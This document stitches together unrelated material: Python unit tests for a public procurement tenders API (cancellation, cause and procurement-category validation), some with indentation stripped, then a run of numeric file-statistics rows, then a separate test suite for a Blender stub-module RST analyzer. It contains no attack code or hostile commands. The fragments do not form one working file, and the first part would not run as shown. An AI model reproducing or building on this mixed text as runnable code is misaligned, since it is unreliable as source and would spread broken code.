self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"status": "active"}})
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract = response.json['data']['contracts'][-1]
self.assertEqual(contract['awardID'], award_id)
# time travel
# collapse the complaint stand-still period directly in the DB so the
# contract can be signed immediately
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
if i.get('complaintPeriod', {}): # reporting procedure does not have complaintPeriod
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract['id'], owner_token), {"data": {"status": "active"}})
# check status
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
def tender_cancellation(self):
# Flow under test: an active cancellation moves a tender to 'cancelled'
# at any point before completion; once the tender is 'complete', creating
# a cancellation is forbidden.
# NOTE(review): indentation was stripped from this dump; code lines are kept
# byte-identical.
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create cancellation
# case 1: cancel a freshly created tender
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'cancelled')
# create tender
# case 2: cancel a tender that has a pending award
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# create cancellation
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'cancelled')
# create tender
# case 3: cancel a tender whose award is active (stand-still period)
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 1)
award = response.json['data'][0]
self.assertEqual(award['status'], 'pending')
# set award as active
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
# get contract id
# NOTE(review): this contract_id is never used before being reassigned in
# case 4 below; the GET also implicitly asserts a contract exists.
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
# create cancellation in stand still
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'cancelled')
# create tender
# case 4: a completed tender cannot be cancelled
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 1)
award = response.json['data'][0]
self.assertEqual(award['status'], 'pending')
# set award as active
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
# collapse the complaint stand-still directly in the DB so the contract
# can be signed immediately
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
if i.get('complaintPeriod', {}): # works for negotiation tender
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token), {"data": {"status": "active"}})
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'complete')
# create cancellation
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'complete')
# TenderNegotiationProcessTest
def tender_cause(self):
    """Validate 'cause' / 'causeDescription' rules on tender creation.

    Checks, in order: a missing 'cause' is rejected, an unknown 'cause'
    value is rejected, a missing or empty 'causeDescription' is rejected,
    and a valid payload is accepted and can later have its 'cause' patched.
    """
    payload = deepcopy(self.initial_data)

    # 'cause' is a required field for this procedure
    del payload['cause']
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u'This field is required.'], u'location': u'body', u'name': u'cause'}
    ])

    # 'cause' must come from the allowed choices
    payload['cause'] = 'unexisting value'
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u"Value must be one of ['artContestIP', 'noCompetition', 'twiceUnsuccessful', 'additionalPurchase', 'additionalConstruction', 'stateLegalServices']."],
         u'location': u'body', u'name': u'cause'}
    ])

    # 'causeDescription' is required once a valid cause is given
    payload['cause'] = 'noCompetition'
    del payload['causeDescription']
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u'This field is required.'], u'location': u'body', u'name': u'causeDescription'}
    ])

    # ...and must not be empty
    payload['causeDescription'] = ''
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u'String value is too short.'], u'location': u'body', u'name': u'causeDescription'}
    ])

    # a well-formed payload is accepted
    payload['causeDescription'] = "blue pine"
    resp = self.app.post_json('/tenders', {"data": payload})
    self.assertEqual(resp.status, '201 Created')
    self.assertEqual(resp.json['data']['causeDescription'], 'blue pine')

    # the owner may patch 'cause' to another allowed value afterwards
    tender_id = self.tender_id = resp.json['data']['id']
    owner_token = resp.json['access']['token']
    resp = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token), {"data": {"cause": "artContestIP"}})
    self.assertEqual(resp.status, '200 OK')
    self.assertEqual(resp.json['data']['cause'], 'artContestIP')
# TenderNegotiationQuickProcessTest
def tender_cause_quick(self):
    """Validate 'cause' rules for the quick negotiation procedure.

    Here 'cause' is optional (a payload without it is accepted) but, when
    present, must be one of the allowed values including 'quick', and a
    chosen cause requires a non-empty 'causeDescription'.
    """
    payload = deepcopy(self.initial_data)

    # no 'cause' at all is fine for the quick procedure
    self.assertNotIn('cause', payload)
    resp = self.app.post_json('/tenders', {"data": payload})
    self.assertEqual(resp.status, '201 Created')

    # an unknown 'cause' is rejected with the full list of choices
    payload['cause'] = 'unexisting value'
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u"Value must be one of ['quick', 'artContestIP', 'noCompetition', 'twiceUnsuccessful', 'additionalPurchase', 'additionalConstruction', 'stateLegalServices']."],
         u'location': u'body', u'name': u'cause'}
    ])

    # with a cause chosen, 'causeDescription' becomes required
    payload['cause'] = 'quick'
    del payload['causeDescription']
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u'This field is required.'], u'location': u'body', u'name': u'causeDescription'}
    ])

    # ...and must not be empty
    payload['causeDescription'] = ''
    resp = self.app.post_json('/tenders', {"data": payload}, status=422)
    self.assertEqual(resp.status, '422 Unprocessable Entity')
    self.assertEqual(resp.content_type, 'application/json')
    self.assertEqual(resp.json['status'], 'error')
    self.assertEqual(resp.json['errors'], [
        {u'description': [u'String value is too short.'], u'location': u'body', u'name': u'causeDescription'}
    ])

    # a well-formed payload is accepted
    payload['causeDescription'] = "blue pine"
    resp = self.app.post_json('/tenders', {"data": payload})
    self.assertEqual(resp.status, '201 Created')
    self.assertEqual(resp.json['data']['causeDescription'], 'blue pine')
def tender_with_main_procurement_category(self):
    """Validate the 'mainProcurementCategory' field on create and update.

    An unknown value is rejected with 422; a valid value ('goods') is
    accepted on creation and may be patched to another valid value
    ('services') while the tender is active.
    """
    # Use deepcopy as the sibling tests do: dict(**...) only copied the top
    # level, so mutating nested structures could leak into self.initial_data.
    data = deepcopy(self.initial_data)

    # test fail creation: value outside the allowed set
    data["mainProcurementCategory"] = "whiskey,tango,foxtrot"
    response = self.app.post_json('/tenders', {'data': data}, status=422)
    self.assertEqual(
        response.json['errors'],
        [{
            "location": "body",
            "name": "mainProcurementCategory",
            "description": ["Value must be one of ['goods', 'services', 'works']."]
        }]
    )

    # test success creation
    data["mainProcurementCategory"] = "goods"
    response = self.app.post_json('/tenders', {'data': data})
    self.assertEqual(response.status, '201 Created')
    self.assertIn('mainProcurementCategory', response.json['data'])
    self.assertEqual(response.json['data']['mainProcurementCategory'], "goods")
    tender = response.json['data']
    token = response.json['access']['token']
    self.tender_id = tender['id']

    # test success update tender in active status
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], token),
                                   {'data': {'mainProcurementCategory': "services"}})
    self.assertEqual(response.status, '200 OK')
    self.assertIn('mainProcurementCategory', response.json['data'])
    self.assertEqual(response.json['data']['mainProcurementCategory'], "services")
| 47.482155
| 190
| 0.641514
| 7,800
| 67,852
| 5.481795
| 0.051026
| 0.122433
| 0.14685
| 0.089527
| 0.882291
| 0.865288
| 0.850484
| 0.838533
| 0.816222
| 0.805627
| 0
| 0.016804
| 0.185227
| 67,852
| 1,428
| 191
| 47.515406
| 0.75662
| 0.025231
| 0
| 0.733813
| 0
| 0.001799
| 0.257706
| 0.055635
| 0
| 0
| 0
| 0
| 0.376799
| 1
| 0.021583
| false
| 0
| 0.005396
| 0
| 0.026978
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86797682b896f3258e622cb0747e755265953e33
| 70,147
|
py
|
Python
|
tests/python/fake_bpy_module_test/fake_bpy_module_test/analyzer_test.py
|
kant/fake-bpy-module
|
9de0e4cce17ee7e7c50fa2a3189584dd4b2bc897
|
[
"MIT"
] | 707
|
2017-10-28T04:37:26.000Z
|
2022-03-31T10:02:28.000Z
|
tests/python/fake_bpy_module_test/fake_bpy_module_test/analyzer_test.py
|
kant/fake-bpy-module
|
9de0e4cce17ee7e7c50fa2a3189584dd4b2bc897
|
[
"MIT"
] | 75
|
2017-12-05T00:26:19.000Z
|
2022-03-14T09:27:15.000Z
|
tests/python/fake_bpy_module_test/fake_bpy_module_test/analyzer_test.py
|
kant/fake-bpy-module
|
9de0e4cce17ee7e7c50fa2a3189584dd4b2bc897
|
[
"MIT"
] | 72
|
2018-02-17T08:08:20.000Z
|
2022-03-27T07:06:51.000Z
|
import os
import difflib
import json
from . import common
from fake_bpy_module.analyzer import (
BaseAnalyzer,
AnalyzerWithModFile,
)
from fake_bpy_module.common import (
SectionInfo,
ClassInfo,
FunctionInfo,
VariableInfo,
)
class BaseAnalyzerTest(common.FakeBpyModuleTestBase):
name = "BaseAnalyzerTest"
module_name = __module__
data_dir = os.path.abspath("{}/analyzer_test_data".format(os.path.dirname(__file__)))
def setUp(self):
# No fixtures of our own; delegate to the common test base.
super().setUp()
def tearDown(self):
# Nothing of our own to clean up; delegate to the common test base.
super().tearDown()
def compare_dict_and_log(self, d1, d2):
    """Assert *d1* equals *d2*, logging a unified diff of their JSON forms.

    The diff is written via self.log before the assertion so a failure
    report shows exactly which keys/values differ.
    """
    first_lines = json.dumps(d1, indent=4).split("\n")
    second_lines = json.dumps(d2, indent=4).split("\n")
    self.log("\n".join(difflib.unified_diff(first_lines, second_lines)))
    self.assertDictEqual(d1, d2)
def test_no_contents(self):
    """An RST file with no contents parses into one empty section."""
    target = "{}/{}".format(self.data_dir, "no_contents.rst")
    result = BaseAnalyzer().analyze([target])
    self.assertEqual(len(result.section_info), 1)
    expected = SectionInfo()
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_only_base_class(self):
    """An RST file declaring only a base class yields one empty section."""
    target = "{}/{}".format(self.data_dir, "only_base_class.rst")
    result = BaseAnalyzer().analyze([target])
    self.assertEqual(len(result.section_info), 1)
    expected = SectionInfo()
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_only_module_name(self):
    """An RST file containing only a module declaration yields one empty section.

    NOTE(review): the test name says "module_name" but the fixture file is
    "only_module_class.rst" — presumably intentional; confirm against the
    fixture directory.
    """
    target = "{}/{}".format(self.data_dir, "only_module_class.rst")
    result = BaseAnalyzer().analyze([target])
    self.assertEqual(len(result.section_info), 1)
    expected = SectionInfo()
    self.compare_dict_and_log(result.section_info[0].to_dict(),
                              expected.to_dict())
def test_single_constant(self):
# A module documenting one data attribute parses into a single
# VariableInfo("constant") entry with name/description/module/data_type.
rst_files = ["single_constant.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
# build the expected section and compare against the parsed one
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_constants(self):
# Two documented data attributes parse into two VariableInfo entries;
# DATA_1 has no data_type and DATA_2 has no description, checking that
# partially documented constants are handled.
rst_files = ["multiple_constants.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
}, method='NEW')
section_info.add_info(variable_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"module": "module.a",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_single_function(self):
# A single documented function parses into one FunctionInfo with three
# parameters (including string and int defaults) and a return section.
rst_files = ["single_function.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\"", "arg_3=1234"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
},
{
"type": "parameter",
"name": "arg_3",
"description": "function_1 arg_3 description",
"data_type": "function_1 arg_3 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_functions(self):
# Two documented functions parse into two FunctionInfo entries: one with
# parameters but no return, one with a return but no parameters.
rst_files = ["multiple_functions.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}]
}, method='NEW')
section_info.add_info(function_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "method_1",
"description": "method_1 description",
"module": "module.a",
"parameters": [],
"parameter_details": [],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_single_class(self):
# One documented class parses into a ClassInfo with two attributes and
# four methods covering every method flavor: instance method, classmethod,
# staticmethod, and a function documented inside a class (also treated as
# staticmethod). Defaults exercise string, int, tuple and quoted forms.
rst_files = ["single_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
},
{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "method_1 arg_2 description",
"data_type": "method_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
},
{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=123"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "classmethod_1 arg_1 description",
"data_type": "classmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "classmethod_1 arg_2 description",
"data_type": "classmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "classmethod_1 return description",
"data_type": "classmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=(0, 0)"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "staticmethod_1 arg_1 description",
"data_type": "staticmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "staticmethod_1 arg_2 description",
"data_type": "staticmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "staticmethod_1 return description",
"data_type": "staticmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "function_1",
"description": "function_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2='MAX_INT'"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_classes(self):
# Two documented classes parse into two ClassInfo entries, each with base
# classes; ClassB's method exercises a float default parameter.
rst_files = ["multiple_classes.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1=5.4"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_noisy_1(self):
# A "noisy" RST file (extra markup/irregular formatting) still parses into
# the expected mix of entries: two classes, one constant and one function.
rst_files = ["noisy_1.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type, long",
}],
"methods": [{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["a", "b"],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1=5.4"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_noisy_2(self):
# A second "noisy" fixture: two classes, two constants and two functions;
# function_1 exercises a nested-list default value and function_2 an
# empty return description/data_type.
rst_files = ["noisy_2.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type, long",
}],
"methods": [{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["a", "b"],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1=5.4"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"description": "DATA_2 description",
"module": "module.a",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1=[[1.3, -3.4], [4.5, -0.9]]"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_2",
"description": "function_2 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_2 arg_1 description",
"data_type": "function_2 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_2 arg_2 description",
"data_type": "str",
}],
"return": {
"type": "return",
"description": "",
"data_type": "",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_invalid_rst_format_1(self):
    """A malformed rst document must make the analyzer raise ValueError."""
    targets = [f"{self.data_dir}/invalid_rst_format_1.rst"]
    analyzer = BaseAnalyzer()
    with self.assertRaises(ValueError):
        result = analyzer.analyze(targets)
        # Only reached if no exception was raised; dump the parse for debugging.
        self.log(json.dumps(result.section_info[0].to_dict(), indent=4))
def test_invalid_rst_format_2(self):
    """A second malformed rst variant must also raise ValueError."""
    targets = [f"{self.data_dir}/invalid_rst_format_2.rst"]
    analyzer = BaseAnalyzer()
    with self.assertRaises(ValueError):
        result = analyzer.analyze(targets)
        # Only reached if no exception was raised; dump the parse for debugging.
